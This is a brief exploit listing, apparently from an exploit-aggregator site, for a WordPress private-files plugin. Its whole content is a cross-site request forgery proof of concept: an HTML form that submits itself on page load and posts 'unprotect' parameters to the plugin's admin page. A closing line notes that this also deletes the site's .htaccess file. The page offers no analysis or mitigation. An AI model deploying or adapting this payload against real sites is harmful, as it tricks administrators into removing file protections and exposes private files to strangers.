Share 
## https://sploitus.com/exploit?id=WPEX-ID:FD8B84B4-6944-4638-BDC1-1CB6AAABD42C
<form id="test" action="https://example.com/wp-admin/tools.php?page=privatefiles.php" method="POST">
    <input type="text" name="level" value="-1">
    <input type="text" name="unprotect" value="Unprotect">
    <input type="text" name="submit" value="true">
</form>
<script>
    document.getElementById("test").submit();
</script>

That will also delete the .htaccess